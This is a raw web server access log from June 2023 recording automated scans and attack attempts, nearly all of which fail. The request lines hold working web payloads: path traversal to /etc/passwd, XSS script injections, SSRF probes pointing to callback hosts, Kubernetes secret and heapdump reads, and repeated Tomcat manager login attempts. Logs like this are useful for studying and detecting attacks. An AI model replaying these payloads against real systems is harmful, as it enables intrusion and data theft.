103.145.191.109 - - [17/Jun/2023:18:26:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:26:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:29:31 +0530] "GET /service/v1/service-details HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:29:31 +0530] "GET /service/v1/service-details HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:18:30:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:30:20 +0530] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:18:30:20 +0530] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 404 1052
41.186.73.134 - - [17/Jun/2023:18:31:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:32:16 +0530] "GET /api/security/ticket HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:18:32:16 +0530] "GET /api/security/ticket HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:18:34:13 +0530] "GET /service/0/test.oast.me HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:18:34:13 +0530] "GET /service/0/test.oast.me HTTP/1.1" 404 1038
41.186.73.134 - - [17/Jun/2023:18:34:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:35:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:35:32 +0530] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:18:35:32 +0530] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:18:35:35 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:18:35:35 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:18:36:50 +0530] "GET /bonita/portal/themeResource?location=etc/passwd&theme=portal/../../../../../../../../../../../../../../../../ HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:18:36:53 +0530] "GET /bonita/portal/themeResource?location=etc/passwd&theme=portal/../../../../../../../../../../../../../../../../ HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:18:36:53 +0530] "GET /bonita/portal/themeResource?location=Windows/win.ini&theme=portal/../../../../../../../../../../../../../../../../ HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:18:36:56 +0530] "GET /bonita/portal/themeResource?location=Windows/win.ini&theme=portal/../../../../../../../../../../../../../../../../ HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:18:37:22 +0530] "GET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:18:37:23 +0530] "GET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:18:37:24 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:18:37:26 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:18:38:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:39:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:18:41:08 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:18:41:08 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:18:41:08 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:18:41:08 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:18:41:13 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:18:41:13 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:18:41:13 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:18:41:13 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:18:43:02 +0530] "GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:18:43:02 +0530] "GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1052
41.186.73.134 - - [17/Jun/2023:18:43:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:44:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:45:41 +0530] "GET /admin/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:18:45:42 +0530] "GET /admin/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:18:45:44 +0530] "GET /admin/ HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:18:45:45 +0530] "GET /admin/ HTTP/1.1" 404 1006
41.186.73.134 - - [17/Jun/2023:18:47:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:48:04 +0530] "GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:18:48:05 +0530] "GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:18:48:26 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:28 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:18:48:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:48:30 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:33 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:35 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:36 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:37 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:38 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:40 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:41 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:44 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:48:46 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:51:20 +0530] "GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:18:51:21 +0530] "GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:18:51:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:52:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:53:09 +0530] "POST /website/blog/ HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:18:53:11 +0530] "POST /_search HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:18:53:11 +0530] "POST /website/blog/ HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:18:53:13 +0530] "POST /_search HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:18:56:08 +0530] "GET /%2e/WEB-INF/web.xml HTTP/1.1" 404 992
107.189.31.184 - - [17/Jun/2023:18:56:08 +0530] "GET /%2e/WEB-INF/web.xml HTTP/1.1" 404 992
41.186.73.134 - - [17/Jun/2023:18:56:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:56:49 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:18:56:50 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
41.186.73.134 - - [17/Jun/2023:18:57:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:57:29 +0530] "POST /js/jquery_file_upload/server/php/ HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:18:57:29 +0530] "POST /js/jquery_file_upload/server/php/ HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:18:57:58 +0530] "POST /api/graphql HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:18:57:58 +0530] "POST /api/graphql HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:19:00:16 +0530] "GET /api/v1/data?after=-120&chart=system.cpu&dimensions=iowait&format=json&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&points=125 HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:19:00:17 +0530] "GET /api/v1/data?after=-120&chart=system.cpu&dimensions=iowait&format=json&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&points=125 HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:19:00:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:01:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:02:11 +0530] "GET /resources//../WEB-INF/web.xml HTTP/1.1" 404 992
107.189.31.184 - - [17/Jun/2023:19:02:12 +0530] "GET /resources//../WEB-INF/web.xml HTTP/1.1" 404 992
107.189.31.184 - - [17/Jun/2023:19:02:53 +0530] "GET /?pretty HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:02:53 +0530] "GET /?pretty HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:02:55 +0530] "GET /_cat/indices?v HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:19:02:56 +0530] "GET /_cat/indices?v HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:19:02:58 +0530] "GET /_all/_search HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:19:02:59 +0530] "GET /_all/_search HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:19:03:01 +0530] "GET /_cluster/health?pretty HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:19:03:02 +0530] "GET /_cluster/health?pretty HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:19:03:05 +0530] "GET /select_project.php?url=http://interact.sh HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:19:03:06 +0530] "GET /select_project.php?url=http://interact.sh HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:19:03:07 +0530] "GET /clock_status.php?current_page=http://interact.sh HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:19:03:08 +0530] "GET /clock_status.php?current_page=http://interact.sh HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:19:03:42 +0530] "GET /index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:19:03:42 +0530] "GET /index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:19:04:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:05:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:06:08 +0530] "GET /metadata/v1.json HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:19:06:09 +0530] "GET /metadata/v1.json HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:19:06:11 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:19:06:12 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:19:09:05 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:19:09:05 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:19:09:05 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:19:09:05 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:19:09:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:19:09:10 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:19:09:10 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:19:09:10 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:19:09:10 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:19:10:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:13:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:14:06 +0530] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 404 1080
107.189.31.184 - - [17/Jun/2023:19:14:07 +0530] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 404 1080
41.186.73.134 - - [17/Jun/2023:19:14:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.128.232.141 - - [17/Jun/2023:19:16:21 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:19:17:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:18:05 +0530] "GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1" 404 1088
107.189.31.184 - - [17/Jun/2023:19:18:06 +0530] "GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1" 404 1088
107.189.31.184 - - [17/Jun/2023:19:18:20 +0530] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?_cfclient=true&inPassword=foo&method=wizardHash&returnFormat=wddx HTTP/1.1" 404 1118
107.189.31.184 - - [17/Jun/2023:19:18:23 +0530] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?_cfclient=true&inPassword=foo&method=wizardHash&returnFormat=wddx HTTP/1.1" 404 1118
41.186.73.134 - - [17/Jun/2023:19:18:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:21:11 +0530] "GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:19:21:11 +0530] "GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:19:21:21 +0530] "GET /ws_ftp.log HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:19:21:22 +0530] "GET /ws_ftp.log HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:19:21:24 +0530] "GET /WS_FTP.LOG HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:19:21:25 +0530] "GET /WS_FTP.LOG HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:19:22:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:23:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:25:37 +0530] "POST /menu/stapp HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:19:25:37 +0530] "POST /menu/stapp HTTP/1.1" 404 1014
45.128.232.141 - - [17/Jun/2023:19:26:07 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:19:26:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:27:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:28:06 +0530] "GET /download.php?file=../../../../../etc/passwd HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:19:28:07 +0530] "GET /download.php?file=../../../../../etc/passwd HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:19:30:51 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:19:30:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:30:57 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:19:31:19 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_arcadegames HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:19:31:19 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_arcadegames HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:19:31:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:35:09 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:19:35:09 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
41.186.73.134 - - [17/Jun/2023:19:35:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:36:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:39:09 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:39:10 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:39:11 +0530] "GET /public/config.js HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:19:39:12 +0530] "GET /public/config.js HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:19:39:13 +0530] "GET /config.js HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:19:39:15 +0530] "GET /config.js HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:19:39:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:40:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:41:28 +0530] "GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1" 404 1166
107.189.31.184 - - [17/Jun/2023:19:41:29 +0530] "GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1" 404 1166
107.189.31.184 - - [17/Jun/2023:19:42:14 +0530] "POST /index/gettunnel HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:19:42:14 +0530] "POST /index/gettunnel HTTP/1.1" 404 1024
45.128.232.141 - - [17/Jun/2023:19:42:55 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
42.114.173.5 - - [17/Jun/2023:19:43:50 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:19:44:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:44:38 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:44:38 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:19:45:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:48:00 +0530] "GET /onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ== HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:19:48:00 +0530] "GET /onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ== HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:19:48:03 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:19:48:05 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:19:48:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:49:05 +0530] "GET /debug/vars HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:19:49:06 +0530] "GET /debug/vars HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:19:49:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:50:18 +0530] "GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/2RHotmfAaxhtl1TTAGnvdZvRiCH/)%3C/script%3E+ HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:50:19 +0530] "GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/2RHotmfAaxhtl1TTAGnvdZvRiCH/)%3C/script%3E+ HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:52:00 +0530] "GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:19:52:01 +0530] "GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1" 404 1076
41.186.73.134 - - [17/Jun/2023:19:52:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:54:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:54:49 +0530] "GET /?t5olou=1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:54:49 +0530] "GET /?t5olou=1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:54:51 +0530] "GET /?t5olou=1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:19:54:51 +0530] "GET /?t5olou=1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:19:55:56 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:19:55:56 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:19:55:56 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:19:55:56 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:19:56:01 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:19:56:01 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:19:56:01 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:19:56:02 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:19:57:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:19:58:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:19:59:18 +0530] "POST /configWizard/keyUpload.jsp HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:19:59:19 +0530] "POST /configWizard/keyUpload.jsp HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:19:59:30 +0530] "GET /domcfg.nsf HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:19:59:30 +0530] "GET /domcfg.nsf HTTP/1.1" 404 1014
42.114.173.5 - - [17/Jun/2023:19:59:53 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:19:59:59 +0530] "GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:20:00:00 +0530] "GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:20:00:01 +0530] "GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:20:00:02 +0530] "GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:20:00:24 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_webtv HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:20:00:24 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_webtv HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:20:02:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:20:03:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
178.184.249.15 - - [17/Jun/2023:20:04:36 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:20:06:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
198.199.92.47 - - [17/Jun/2023:20:07:19 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:20:07:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
198.199.92.47 - - [17/Jun/2023:20:07:37 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:20:07:55 +0530] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:20:07:57 +0530] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 1130
107.189.31.184 - - [17/Jun/2023:20:07:57 +0530] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:20:07:59 +0530] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 1130
45.128.232.141 - - [17/Jun/2023:20:08:58 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:20:09:04 +0530] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:20:09:04 +0530] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:20:10:25 +0530] "GET /s/2RHou6zDpsXtW3NEzgFLJzwvJky/_/;/WEB-INF/web.xml HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:20:10:25 +0530] "GET /s/2RHou6zDpsXtW3NEzgFLJzwvJky/_/;/WEB-INF/web.xml HTTP/1.1" 404 1092
41.186.73.134 - - [17/Jun/2023:20:10:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:20:11:28 +0530] "GET /heapdump HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:20:11:30 +0530] "GET /heapdump HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:20:11:30 +0530] "GET /actuator/heapdump HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:20:11:32 +0530] "GET /actuator/heapdump HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:20:12:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.108 - - [17/Jun/2023:20:12:14 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:20:12:14 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:20:12:19 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:20:12:19 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:20:12:25 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:20:12:25 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [17/Jun/2023:20:12:30 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:20:12:30 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:20:14:49 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_market HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:20:14:50 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_market HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:20:15:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
